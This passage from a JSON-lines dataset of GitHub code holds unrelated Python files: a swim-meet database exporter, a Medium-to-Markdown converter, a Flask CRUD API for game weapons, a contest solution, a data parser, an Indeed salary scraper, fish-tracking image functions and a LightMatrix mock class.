cur.close()\n conn.close()\n\ndef OutputTable(conn_str):\n '''Output the specified table as .csv'''\n # Connect to an existing database\n tableList =['Org', \"Meet\", \"Participant\", \"Leg\", \"Stroke\", \"Distance\", \"Event\", \"StrokeOf\", \"Heat\", \"Swim\"]\n\n# selection= input(\"What Tables Do You Want to Output? Please list all of them and separate each table by ',' without space. 
\\n(Org, Meet, Participant, Event, Stroke, Distance, Heat, Swim, Leg, StrokeOf)\\n\")\n# tableList = selection.split(',')\n outputTableDList = []\n fileName= input(\"What is the name for file (without .csv)\")\n# outputPath = \"output/output.csv\"\n\n \n try:\n conn = psycopg2.connect(conn_str)\n print(\"Opened database successfully\")\n except:\n print(\"I am unable to connect to the database\")\n \n # Open a cursor to perform database operations\n cur = conn.cursor()\n \n for tblName in tableList:\n if tblName == 'Org':\n cur.callproc('OutputOrg')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Meet':\n cur.callproc('OutputMeet')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Participant':\n cur.callproc('OutputParticipant')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Event':\n cur.callproc('OutputEvent')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Stroke':\n cur.callproc('OutputStroke')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Distance':\n cur.callproc('OutputDistance')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Heat':\n cur.callproc('OutputHeat')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Swim':\n cur.callproc('OutputSwim')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Leg':\n cur.callproc('OutputLeg')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'StrokeOf':\n cur.callproc('OutputStrokeOf')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n # Make the changes to the database persistent\n conn.commit()\n \n # Close communication with the database\n cur.close()\n conn.close()\n \n try:\n with open(fileName + '.csv', 'w') as fp:\n for tblNameIdx, tblData in enumerate(outputTableDList):\n fp.write(\"*%s\\n\"%tableList[tblNameIdx])\n size = len(tblData[0])\n formatStr = \",\".join(['%s' for i in range(size)])\n fp.write('\\n'.join(formatStr % tuple([y if not isinstance(y, bool) else int(y) for y in x]) for x in tblData))\n fp.write('\\n')\n except:\n with open(fileName + '.csv', 'w') as fp:\n fp.write(\"\")\n print(\"Empty query, output an empty .csv file\")\n \n","repo_name":"Zhenshan-Jin/Swimming_Championships_Database","sub_path":"CRUD.py","file_name":"CRUD.py","file_ext":"py","file_size_in_byte":12643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39467385384","text":"# coding: utf8\nfrom bs4 import BeautifulSoup\nfrom requests import get\nfrom tag_mapper import TagMapper\n\n\nclass MediumToMarkdown:\n def __init__(self, post_url):\n self.post_url = post_url\n\n def transform(self):\n responses = self.medium_post()\n fname = '-'.join(responses.url.split('/')[-1].split('-')[:-1])\n\n markdown_file = open(f\"{fname}.md\", \"w+\", encoding=\"utf8\")\n for section in responses:\n for tag in section:\n # skip author infomation\n if tag.name == 'div' and 'uiScale-caption--regular' in tag[\"class\"]:\n continue\n markdown_tag = TagMapper(tag).to_markdown()\n if markdown_tag:\n markdown_file.write(markdown_tag)\n markdown_file.write(\"\\n\\n\")\n\n markdown_file.close()\n\n def medium_post(self):\n post_content = self.medium_post_response().content\n soup = BeautifulSoup(post_content, 'html.parser')\n return soup.find_all(\"div\", {\"class\": \"sectionLayout--insetColumn\"})\n\n def medium_post_response(self):\n return get(self.post_url, 
stream=True)\n","repo_name":"imteekay/m2m","sub_path":"m2m/medium_to_markdown.py","file_name":"medium_to_markdown.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"52"} +{"seq_id":"39798145101","text":"from flask import Flask, request, jsonify\nimport psycopg2\n\napp = Flask(__name__)\n\nconn = psycopg2.connect(\"dbname='items' host='localhost'\")\ncursor = conn.cursor()\n\n@app.route('/weapon/add', methods=(['POST']))\ndef add_weapon():\n form = request.form\n name = form.get('name')\n if name =='':\n return jsonify(\"Name is required!\"), 400\n type = form.get('type')\n if type =='':\n return jsonify(\"Type is required!\"), 400\n damage = form.get('damage')\n size = form.get('size')\n rating = form.get('rating', '5')\n if rating.isnumeric():\n rating = int(rating)\n else:\n return jsonify('Rating must be numeric'), 400\n \n cursor.execute(\"INSERT INTO weapons (name, type, damage, size, rating) VALUES(%s,%s,%s,%s,%s)\",(name, type, damage, size, rating))\n conn.commit()\n return jsonify('Weapon added'), 200\n\n@app.route('/weapon/edit/', methods=(['POST']))\ndef edit_weapon(weapon_id):\n if weapon_id.isnumeric():\n weapon_id = int(weapon_id)\n else:\n return jsonify('ID must be numeric'), 400\n results = cursor.execute('SELECT id FROM weapons WHERE id = %s', [weapon_id])\n results= cursor.fetchone()\n if results == None:\n return jsonify('No weapon found, please try again.'), 404\n form = request.form\n name = form.get('name')\n if name =='':\n return jsonify(\"Name is required!\"), 400\n type = form.get('type')\n if type =='':\n return jsonify(\"Type is required!\"), 400\n damage = form.get('damage')\n size = form.get('size')\n rating = form.get('rating', '5')\n if rating.isnumeric():\n rating = int(rating)\n else:\n return jsonify('Rating must be numeric'), 400\n \n cursor.execute(\"UPDATE weapons SET (name, type, damage, size, rating) = (%s,%s,%s,%s,%s) WHERE id = %s\",(name, type, damage, size, rating, weapon_id))\n conn.commit()\n return jsonify('Weapon edited'), 200\n\n# @app.route('/weapon/', methods=(['GET']))\n# def get_weapon_by_name(weapon_name):\n# results = cursor.execute('SELECT id, name, type, damage, size, rating FROM weapons WHERE LOWER(name) LIKE %s', [f'%{weapon_name.lower()}%'])\n# results= cursor.fetchone()\n# if results == None:\n# return jsonify('No weapon found, please try again.'), 404\n# results_dictionary = {\n# 'id' : results[0],\n# 'name' : results[1],\n# 'type' : results[2],\n# 'damage' : results[3],\n# 'size' : results[4],\n# 'rating' : results[5]\n# }\n# return jsonify(results_dictionary),200\n\n@app.route('/weapon/', methods=(['GET']))\ndef get_weapon_by_name(weapon_id):\n if weapon_id.isnumeric():\n weapon_id = int(weapon_id)\n else:\n return jsonify('ID must be numeric'), 400\n results = cursor.execute('SELECT id, name, type, damage, size, rating FROM weapons WHERE id = %s', [weapon_id])\n results= cursor.fetchone()\n if results == None:\n return jsonify('No weapon found, please try again.'), 404\n results_dictionary = {\n 'id' : results[0],\n 'name' : results[1],\n 'type' : results[2],\n 'damage' : results[3],\n 'size' : results[4],\n 'rating' : results[5]\n }\n return jsonify(results_dictionary),200\n\n@app.route('/weapon/delete/', methods=(['DELETE']))\ndef delete_weapon_by_id(weapon_id):\n if weapon_id.isnumeric():\n weapon_id = int(weapon_id)\n else:\n return jsonify('ID must be numeric'), 400\n result = cursor.execute('SELECT name, id FROM weapons WHERE id = 
%s', [weapon_id])\n result= cursor.fetchone()\n if result == None:\n return jsonify('No weapon found, please try again.'), 404\n cursor.execute('DELETE from weapons WHERE id = %s', [weapon_id])\n conn.commit()\n return jsonify(f'Weapon ({result[0]}, ID#{result[1]}) deleted'), 200\n\n\n@app.route('/weapons/list', methods=(['GET']))\ndef get_all_weapons():\n results = cursor.execute('SELECT id, name, type, damage, size, rating FROM weapons')\n results = cursor.fetchall()\n list_of_weapons = []\n\n for x in results:\n list_of_weapons.append({\n 'id' : x[0],\n 'name' : x[1],\n 'type' : x[2],\n 'damage' : x[3],\n 'size' : x[4],\n 'rating' : x[5]\n })\n \n \n return jsonify({'weapons' : list_of_weapons}),200\n\nif __name__ == \"__main__\":\n app.run()\n\n# CREATE TABLE IF NOT EXISTS Weapons (\n# id serial PRIMARY KEY,\n# Name VARCHAR NOT NULL,\n# Type VARCHAR NOT NULL,\n# Damage VARCHAR,\n# Size VARCHAR,\n# Rating INT DEFAULT 5\n# );","repo_name":"BadArce/beginner-flask-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26532262061","text":"n, m, d = map(int, input().split())\nplanks = list(map(int, input().split()))\n\nonRight = n + 1\ntotal = sum(planks)\n\ncur = 0\n\ndata = [0 for i in range(n + 2)]\n\nfor j, plank in enumerate(planks):\n\n dist = onRight - total + d if total + d > onRight else d\n\n if dist < 0:\n break\n\n print(cur + dist)\n cur += dist\n\n \n for i in range(plank):\n data[cur + i] = j + 1\n\n cur += plank - 1\n \n onRight = n - cur\n total -= plank\nelse:\n print(\"YES\")\n print(\" \".join(map(str, data[1:-1])))\n quit()\nprint(\"NO\")\n \n","repo_name":"cormackikkert/competitive-programming","sub_path":"CodeForces/Round 598/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31605166367","text":"import Utilities as U\n\n\ndef extractAUXData(inputAUXData_Lines):\n '''Given AUX data lines of 36 bits each, this function extracts hit coordinates for tracks and\n returns in the form of a list with (sectorID, 11 hit coordinates).'''\n\n # extracted values\n coordinates = []\n sectorIDs = []\n nTracks = 0\n\n # control and header words\n headerCount = -1\n readingDataWords = False\n trackWordCount = -1\n trackCoordinates = []\n\n # read through each line of the file\n for lineNumber, line in enumerate(inputAUXData_Lines, start=1):\n\n if headerCount >= 0 and headerCount <= 6:\n headerCount += 1\n if headerCount == 7:\n readingDataWords = True\n\n if U.regSlice(line, 31, 16) == '1110000011011010': # e0da\n readingDataWords = False\n AUXData = zip(sectorIDs, coordinates)\n yield AUXData # return one event\n sectorIDs = []\n coordinates = []\n\n if U.regSlice(line, 31, 16) == '1011000011110000': # b0f0\n headerCount = 0\n\n if U.regSlice(line, 31, 16) == '1110000011110000': # e0f0\n headerCount = -1\n\n if readingDataWords:\n\n trackWordCount += 1\n\n if U.regSlice(line, 31, 31) == '1': # begin track\n # sectorID = U.regSlice(line, 12, 0) + '00'\n sectorID = U.regSlice(line, 15, 0)\n sectorIDs.append(int(sectorID, 2))\n nTracks += 1\n trackWordCount = 0\n trackCoordinates = []\n\n if trackWordCount >= 2 and trackWordCount <= 4: # pixel hit clusters\n columnCoord = U.regSlice(line, 27, 16)\n rowCoord = U.regSlice(line, 11, 0)\n trackCoordinates.append(rowCoord)\n trackCoordinates.append(columnCoord)\n\n if 
trackWordCount >= 5 and trackWordCount <= 9: # SCT hit clusters\n hit1Coord = U.regSlice(line, 10, 0)\n trackCoordinates.append(hit1Coord)\n\n if trackWordCount == 9: # end of track\n trackCoordinates = [U.binToInt(num) for num in trackCoordinates]\n coordinates.append(trackCoordinates) # 11 coordinates total - first 6 are pixels (row, col), and last 5 are SCT\n","repo_name":"MattUnderscoreZhang/EXTFPythonScript","sub_path":"AUXDataExtraction.py","file_name":"AUXDataExtraction.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11108022641","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport csv\nimport re\nimport io\nimport pandas as pd\n\n# Windows users need to specify the path to chrome driver you just downloaded.\n# You need to unzip the zipfile first and move the .exe file to any folder you want.\ndriver = webdriver.Chrome(r'C:\\Users\\Murugesan\\Desktop\\DataScience Projects\\Webscrap\\Indeed_selenium\\chromedriver.exe')\n# driver = webdriver.Chrome()\n\n# Click job button to go to the job section\n# Windows users need to open the file using 'wb'\n# csv_file = open('jobs.csv', 'wb')\n\ncsv_file = io.open('Data-Analyst-SalariesWI.csv', 'w', encoding=\"utf-8\", newline='')\nwriter = csv.writer(csv_file)\nwriter.writerow(['title', 'Avg_salary', 'State'])\n# Page index used to keep track of where we are.\n\nstatelist = ['California', 'Florida', 'Georgia', 'Illinois', 'Indiana', 'Maryland', 'Massachusetts','Michigan', 'Minnesota', 'New-Jersey', 'New-York-State', 'North-Carolina', 'Ohio','Pennsylvania', 'Texas', 'Virginia','Washington-State', 'Wisconsin']\n\ntemplate_url = \"https://www.indeed.com/salaries/Data-Analyst-Salaries,-\"\n\ncsv_file = io.open('Data-Analyst-Salaries_US_cities.csv', 'w', encoding=\"utf-8\", newline='')\n\nfor i in statelist:\n\turl = template_url + i\n\tprint (url) \n\tdriver.implicitly_wait(10) \n\tdriver.get(url)\n\n\tindex = 1\n\t#while index <10: # this is to check if the coding works wiht few pages \n\twhile True:\n\t\ttry:\n\t\t\tprint(\"Scraping Page number \" + str(index))\n\t\t\tindex = index + 1\n\t\t\t# Find all the jobs on the page\n\t\t\twait_job = WebDriverWait(driver, 10)\n\t\t\tjoblist = wait_job.until(EC.presence_of_all_elements_located((By.XPATH,\n\t\t\t\t\t\t\t\t\t\t'//tr[@data-tn-component=\"salary-entry[]\"]')))\n\t\t\tprint(\"joblist length = \" + str(len(joblist)))\n\t\t\tfor job in joblist:\n\n\t\t\t\t# Initialize an empty dictionary for each job\n\t\t\t\tjob_dict = {}\n\t\t\t\t# Use relative xpath to locate the title, text, username, date.\n\t\t\t\t# Once you locate the element, you can use 'element.text' to return its string.\n\t\t\t\t# To get the attribute instead of the text of each element, use 'element.get_attribute()'\n\t\t\t\ttitle = job.find_element_by_xpath('.//div[@class=\"cmp-sal-title\"]').text \n\t\t\t\tprint(\"title = \" + title)\n\t\t\t\t\n\t\t\t\tAvg_salary = job.find_element_by_xpath('.//div[@class=\"cmp-sal-summary\"]').text\n\t\t\t\tprint(\"Avg_salary = \" + Avg_salary)\n\n\t\t\t\t\n\t\t\t\tjob_dict['title'] = title\n\t\t\t\tjob_dict['Avg_salary'] = Avg_salary\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\twriter.writerow(job_dict.values())\n\n\n\t\t\twait_button = WebDriverWait(driver, 10)\n\t\t\tnext_button = 
wait_button.until(EC.element_to_be_clickable((By.XPATH,\n\t\t\t\t\t\t\t\t\t\t'//a[@data-tn-element=\"next-page\"]')))\n\t\t\tprint(\"next_button_found\")\n\t\t\tnext_button.click()\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tcsv_file.close()\n\t\t\tdriver.close()\n\t\t\tbreak\n","repo_name":"muruent/Indeedscrap","sub_path":"indeed_salaryscrape_cities.py","file_name":"indeed_salaryscrape_cities.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12203772616","text":"import cv2\nimport numpy as np\nimport random\n\nimport shapely.geometry\nimport shapely.affinity\nfrom shapely.geometry import Polygon\n\nimport DataProcessing\n\n\ndef two_shape_intersect( shape1, shape1_type, shape2, shape2_type):\n mode = ''\n if shape1_type == 'Rect':\n rect1 = shape1\n mode += 'r'\n if shape2_type == 'Rect':\n rect2 = shape2\n mode += 'r'\n elif shape2_type == 'Circle':\n circle1 = shape2\n mode += 'c'\n elif shape1_type == 'Circle':\n circle1 = shape1\n mode += 'c'\n if shape2_type == 'Rect':\n rect1 = shape2\n mode += 'r'\n elif shape2_type == 'Circle':\n circle2 = shape2\n mode += 'c'\n mode =''.join(sorted(mode))\n\n if mode == 'rr':\n p1 = Polygon(rect1)\n p2 = Polygon(rect2)\n intersect = p1.intersects(p2)\n \n return intersect\n\n\ndef mhis_intersect( frame, motions, no_cmp_mot, scale_rate, boundary): \n frame_height, frame_width = frame.shape[:2]\n b_minx, b_miny = boundary[0][0], boundary[0][1]\n b_maxx, b_maxy = boundary[1][0], boundary[1][1]\n region_list = []\n for i in range( 0, len(no_cmp_mot), 1):\n bool_intersect = False\n for j in range( 0, len(no_cmp_mot), 1):\n if i < j :\n temp_list = [no_cmp_mot[i],no_cmp_mot[j]]\n motion_box = []\n for k in range( 0, len(temp_list), 1):\n mot_id = temp_list[k]\n mot_x, mot_y = motions[mot_id][\"X\"], motions[mot_id][\"Y\"]\n mot_w, mot_h = motions[mot_id][\"Width\"], motions[mot_id][\"Height\"]\n p1_x = max(min( mot_x-scale_rate*mot_w, b_maxx), b_minx)\n p1_y = max(min( mot_y-scale_rate*mot_h, b_maxy), b_miny)\n p2_x = max(min( mot_x+(1+scale_rate)*mot_w, b_maxx), b_minx)\n p2_y = max(min( mot_y+(1+scale_rate)*mot_h, b_maxy), b_miny)\n pbox = [[p1_x,p1_y],[p1_x,p2_y],[p2_x,p2_y],[p2_x,p1_y]]\n motion_box.append(pbox)\n\n intersect = two_shape_intersect( motion_box[0], 'Rect', motion_box[1], 'Rect')\n if intersect == True:\n region_list.append(( no_cmp_mot[i], no_cmp_mot[j]))\n if bool_intersect == False:\n bool_intersect = True\n\n if bool_intersect == False:\n region_list.append(( no_cmp_mot[i], no_cmp_mot[i]))\n \n \n res_list = []\n for i in range( 0, len(region_list), 1):\n id1 = region_list[i][0]\n id2 = region_list[i][1]\n bool1, index1 = DataProcessing.find_in_list( res_list, id1)\n bool2, index2 = DataProcessing.find_in_list( res_list, id2)\n if bool1 == True and bool2 == True: \n if index1 != index2:\n group1 = res_list[index1]\n group2 = res_list[index2]\n res_list.append(group1+group2)\n res_list.remove(group1)\n res_list.remove(group2)\n\n elif bool1 == True and bool2 == False: \n temp = res_list[index1]+(id2,)\n res_list[index1] = temp\n elif bool1 == False and bool2 == True: \n temp = res_list[index2]+(id1,)\n res_list[index2] = temp\n elif bool1 == False and bool2 == False: \n temp = region_list[i]\n res_list.append(temp)\n\n for i in range( 0, len(res_list), 1):\n res_list[i] = sorted(list(set(res_list[i])))\n\n roi_box_list = [] \n for i in range( 0, len(res_list), 1): \n res_sublist = res_list[i]\n minx, miny = 0, 0\n maxx, 
maxy = 0, 0\n for j in range( 0, len(res_sublist), 1):\n res_index = res_sublist[j]\n x, y, w, h = motions[res_index][\"X\"], motions[res_index][\"Y\"], motions[res_index][\"Width\"], motions[res_index][\"Height\"]\n p1_x = int(max(min( x-scale_rate*w, b_maxx), b_minx))\n p1_y = int(max(min( y-scale_rate*h, b_maxy), b_miny))\n p2_x = int(max(min( x+(1+scale_rate)*w , b_maxx), b_minx))\n p2_y = int(max(min( y+(1+scale_rate)*h , b_maxy), b_miny))\n if j == 0:\n minx = p1_x\n miny = p1_y\n maxx = p2_x\n maxy = p2_y\n elif j > 0:\n minx = min( p1_x, minx)\n miny = min( p1_y, miny)\n maxx = max( p2_x, maxx)\n maxy = max( p2_y, maxy)\n\n roi_box_list.append(((minx,miny),(maxx,maxy)))\n\n uni_roi_box_list = []\n bool_intersect = False\n bool_no_intersect = True\n for i in range( 0, len(roi_box_list), 1): \n for j in range( 0, len(roi_box_list), 1): \n if i < j:\n box1_x1, box1_y1 = roi_box_list[i][0][0], roi_box_list[i][0][1]\n box1_x2, box1_y2 = roi_box_list[i][1][0], roi_box_list[i][1][1]\n box2_x1, box2_y1 = roi_box_list[j][0][0], roi_box_list[j][0][1]\n box2_x2, box2_y2 = roi_box_list[j][1][0], roi_box_list[j][1][1] \n\n box1 = [[box1_x1,box1_y1],[box1_x1,box1_y2],[box1_x2,box1_y2],[box1_x2,box1_y1]]\n box2 = [[box2_x1,box2_y1],[box2_x1,box2_y2],[box2_x2,box2_y2],[box2_x2,box2_y1]]\n intersect = two_shape_intersect( box1, 'Rect', box2, 'Rect')\n if intersect == True:\n bool_intersect = True\n bool_no_intersect = False\n bool1, index1 = DataProcessing.find_in_list( uni_roi_box_list, i)\n bool2, index2 = DataProcessing.find_in_list( uni_roi_box_list, j)\n if bool1 == True and bool2 == True: \n if index1 != index2:\n group1 = uni_roi_box_list[index1]\n group2 = uni_roi_box_list[index2]\n uni_roi_box_list.append(group1+group2)\n uni_roi_box_list.remove(group1)\n uni_roi_box_list.remove(group2)\n\n elif bool1 == True and bool2 == False:\n temp = uni_roi_box_list[index1]+(j,)\n uni_roi_box_list[index1] = temp\n\n elif bool1 == False and bool2 == True:\n temp = uni_roi_box_list[index2]+(i,)\n uni_roi_box_list[index2] = temp\n\n elif bool1 == False and bool2 == False: \n temp = (i,j)\n uni_roi_box_list.append(temp)\n \n if bool_no_intersect == True:\n uni_roi_box_list.append((i,i)) \n\n elif bool_no_intersect == False:\n bool_no_intersect == True\n \n if bool_intersect == True: \n temp_roi_box_list = []\n temp_res_list = []\n for i in range( 0, len(uni_roi_box_list), 1):\n temp_res = []\n for j in range( 0, len(uni_roi_box_list[i]), 1):\n temp_index = uni_roi_box_list[i][j]\n temp_res = temp_res + res_list[temp_index]\n if j == 0:\n minx, miny = roi_box_list[temp_index][0][0],roi_box_list[temp_index][0][1]\n maxx, maxy = roi_box_list[temp_index][1][0],roi_box_list[temp_index][1][1]\n elif j > 0:\n minx = min( minx, roi_box_list[temp_index][0][0])\n miny = min( miny, roi_box_list[temp_index][0][1])\n maxx = max( maxx, roi_box_list[temp_index][1][0])\n maxy = max( maxy, roi_box_list[temp_index][1][1])\n temp_res = list(set(temp_res))\n temp_res.sort()\n\n temp_roi_box_list.append([(minx,miny),(maxx,maxy)])\n temp_res_list.append(temp_res)\n\n res_list = temp_res_list\n roi_box_list = temp_roi_box_list\n\n return res_list, roi_box_list\n\n\ndef two_contourIntersect( original_image, contour1, contour2):\n contours = [contour1, contour2]\n\n blank = np.zeros(original_image.shape[0:2])\n\n image1 = cv2.drawContours(blank.copy(), contours, 0, 1)\n image2 = cv2.drawContours(blank.copy(), contours, 1, 1)\n\n intersection = np.logical_and(image1, image2)\n\n return intersection.any()\n\n\ndef 
two_contourIntersect_area( original_image, contour1, contour2):\n contours = [contour1, contour2]\n\n blank = np.zeros(original_image.shape[0:2])\n\n image1 = cv2.drawContours(blank.copy(), contours, 0, 1, -1)\n image2 = cv2.drawContours(blank.copy(), contours, 1, 1, -1)\n\n intersection = image1 + image2\n\n image1_area = np.sum(image1 == 1)\n image2_area = np.sum(image2 == 1)\n intersection_area = np.sum( intersection == 2)\n\n return intersection.any(), intersection_area\n\n\n\ndef filter_contour_bgr( cnt1_bgr, cnt2_bgr):\n BGRDiff_Limit = 25\n bool_color = True \n if abs(cnt1_bgr[1]-cnt2_bgr[1]) > BGRDiff_Limit:\n bool_color = False\n\n if abs(cnt1_bgr[2]-cnt2_bgr[2]) > BGRDiff_Limit:\n bool_color = False \n\n return bool_color\n\n\ndef fishid_color_create( fishcolor_dict, fish_dict):\n pixel_deep = 170 \n fishdict_keys = list(fish_dict.keys())\n for i in range( 0, len(fish_dict), 1):\n color_b = random.randint(pixel_deep,255)\n color_g = random.randint(pixel_deep,255)\n color_r = random.randint(pixel_deep,255)\n while color_b <= 30 and color_g <= 30 and color_r <= 235: \n color_b = random.randint(pixel_deep,255)\n color_g = random.randint(pixel_deep,255)\n color_r = random.randint(pixel_deep,255)\n\n color = ( color_b, color_g, color_r)\n fishid = fishdict_keys[i]\n fishcolor_dict[fishid] = color\n\n return fishcolor_dict\n\ndef fishid_color_update( fishcolor_dict, fish_dict): \n pixel_deep = 170 \n fishcolor_keys = list(fishcolor_dict.keys())\n fishdict_keys = list(fish_dict.keys())\n for i in range( 0, len(fish_dict), 1):\n fish_id = fishdict_keys[i]\n if fish_id in fishcolor_keys:\n pass\n elif fish_id not in fishcolor_keys:\n color_b = random.randint(pixel_deep,255)\n color_g = random.randint(pixel_deep,255)\n color_r = random.randint(pixel_deep,255)\n while color_b <= 30 and color_g <= 30 and color_r <= 235: \n color_b = random.randint(pixel_deep,255)\n color_g = random.randint(pixel_deep,255)\n color_r = random.randint(pixel_deep,255)\n color = ( color_b, color_g, color_r)\n fishcolor_dict[fish_id] = color\n\n return fishcolor_dict\n\n\ndef create_fishid_cntid( fish_dict, frame_index):\n fishid_cnt = {}\n cntid_fish = {}\n fishid_list = list(fish_dict.keys())\n for i in range( 0, len(fish_dict), 1):\n fishid = fishid_list[i]\n cnt_id = fish_dict[fishid][\"FrameIndex\"+str(frame_index-1)][\"NextContourID\"]\n fishid_cnt[fishid] = cnt_id\n if cnt_id not in list(cntid_fish.keys()):\n cntid_fish[cnt_id] = [fishid]\n else:\n cntid_fish[cnt_id].append(fishid)\n\n\n return fishid_cnt, cntid_fish\n\n\ndef transfer_cntid_fishid( unionid_list, cntid_fish):\n unionfishid_list = []\n for i in range( 0, len(unionid_list), 1):\n cntid_list = unionid_list[i][0]\n nextcntid_list = unionid_list[i][1]\n fishid_list = []\n for j in range( 0, len(cntid_list), 1):\n cntid = cntid_list[j]\n if cntid in list(cntid_fish.keys()): \n fishids = cntid_fish[cntid]\n else:\n continue\n fishid_list = fishid_list + fishids\n\n fishid_list = list(set(fishid_list)) \n fishid_list.sort() \n\n unionfishid_list.extend([[ fishid_list, nextcntid_list]])\n\n return unionfishid_list\n\n\ndef id_union( compare_dict):\n unionlist = []\n cntid_keys = list(compare_dict.keys())\n for i in range( 0, len(cntid_keys), 1):\n cnt_id = cntid_keys[i]\n nextcnt_ids = compare_dict[cnt_id]\n index_list = []\n for j in range( 0, len(unionlist), 1):\n unionlist_nextcnts = unionlist[j][1]\n bool_in = set(nextcnt_ids) & set(unionlist_nextcnts)\n if bool_in :\n index_list.append(j)\n if len(index_list) == 0:\n unionlist.extend([[ 
[cnt_id],nextcnt_ids ]])\n elif len(index_list) > 0:\n new_cntids = []\n new_nextcntids = []\n for j in range( len(index_list)-1, -1, -1):\n index = index_list[j]\n new_cntids = new_cntids + unionlist[index][0]\n new_nextcntids = new_nextcntids + unionlist[index][1]\n unionlist.pop(index)\n new_cntids = new_cntids + [cnt_id]\n new_nextcntids = new_nextcntids + nextcnt_ids\n unionlist.extend([[ new_cntids,new_nextcntids ]])\n \n for i in range( 0, len(unionlist), 1):\n unionlist[i][0] = list(set(unionlist[i][0]))\n unionlist[i][1] = list(set(unionlist[i][1])) \n\n return unionlist\n\n\ndef compute_roi_cntrect( frame, cnt, multiple, boundary):\n x, y, w, h = cv2.boundingRect(cnt)\n b_minx, b_miny = boundary[0][0], boundary[0][1]\n b_maxx, b_maxy = boundary[1][0], boundary[1][1]\n\n minx = int(max( x-multiple*w, b_minx))\n miny = int(max( y-multiple*h, b_miny))\n maxx = int(min( x+(1+multiple)*w, b_maxx)) \n maxy = int(min( y+(1+multiple)*h, b_maxy))\n\n roi_coordinate = {'minx': minx, 'miny': miny, 'maxx': maxx, 'maxy': maxy}\n roi_frame = frame[miny:maxy, minx:maxx]\n \n return roi_frame, roi_coordinate\n\n\ndef contour_coordinate_transform( contours, minx, miny):\n for i in range( 0, len(contours), 1):\n contours[i][:] += [int(minx),int(miny)] \n \n return contours\n\n\ndef fishid_union( unionfishid_list):\n unionlist = []\n for i in range( 0, len(unionfishid_list), 1):\n fish_ids = unionfishid_list[i][0]\n nextcnt_ids = unionfishid_list[i][1]\n\n cont = 0\n new_list = [[],[]]\n for j in range( 0, len(unionlist), 1):\n unionlist_detail = unionlist[j-cont]\n \n bool_in = set(nextcnt_ids) & set(unionlist_detail[1])\n if bool_in:\n new_list[0] = new_list[0] + unionlist_detail[0]\n new_list[1] = new_list[1] + unionlist_detail[1]\n unionlist.remove(unionlist_detail)\n cont = cont + 1\n new_list[0] = new_list[0] + fish_ids\n new_list[1] = new_list[1] + nextcnt_ids\n unionlist.append(new_list)\n\n for i in range( 0, len(unionlist), 1):\n unionlist[i][0] = list(set(unionlist[i][0]))\n unionlist[i][1] = list(set(unionlist[i][1]))\n\n unionlist[i][0].sort()\n unionlist[i][1].sort()\n\n return unionlist\n\n\ndef color_limit( old_p, new_p, grow_limit):\n diff_p = abs(old_p - new_p)\n grow_p = diff_p * grow_limit * 0.01\n min_p = int(max(0, old_p - grow_p))\n max_p = int(min(254, old_p + grow_p))\n new_p = max( min_p, new_p)\n new_p = min( max_p, new_p)\n\n return new_p\n\n","repo_name":"NTNUNSL/Fish-Motion-Tracking","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":15113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16803858404","text":"from .constants import valid_lightmatrix_images\n\n\nclass LightMatrix:\n \"\"\" LightMatrix\n\n Following are all the functions that are linked to the Light Matrix.\n\n \"\"\"\n\n current_image = \"\"\n\n def __init__(self):\n \"\"\" Constructor for LightMatrix \"\"\"\n print(\"LightMatrix::__init__\")\n\n def show_image(self, image: str, brightness: int = 100):\n \"\"\"Shows an image on the Light Matrix.\n\n Parameters\n ----------\n image : str\n Name of the image\n brightness : int\n Brightness of the image. 
0 to 100% (\"0\" is off, and \"100\" is full brightness.)\n\n Raises\n ------\n TypeError\n image is not a string or brightness is not an integer.\n ValueError\n image is not an allowed value or brightness is outside the range 0-100\n\n \"\"\"\n\n if not isinstance(image, str):\n raise TypeError(\"show_image image must be a str\")\n if not isinstance(brightness, int):\n raise TypeError(\"show_image brightness must be an int\")\n\n if image not in valid_lightmatrix_images:\n raise ValueError(\"show_image: image must be one of %r.\" % valid_lightmatrix_images)\n\n if not 0 <= brightness <= 100:\n raise ValueError(\"show_image: brightness out of range (0-100)\")\n\n self.current_image = image\n print(\"LightMatrix::show_image\")\n print(\"Show %s at %s brightness\" % (image, brightness))\n\n def set_pixel(self, x: int, y: int, brightness: int = 100):\n \"\"\"Sets the brightness of one pixel (one of the 25 LEDs) on the Light Matrix.\n\n Parameters\n ----------\n x : int\n Pixel position, counting from the left. In the range 0 to 4.\n y : int\n Pixel position, counting from the top. In the range 0 to 4\n brightness : int\n Brightness of the pixel. In the range 0 to 100.\n\n Raises\n ------\n TypeError\n One of the parameters is not an integer\n ValueError\n x or y is not in the range 0 to 4 or brightness is not in the range 0 to 100.\n\n \"\"\"\n\n if not 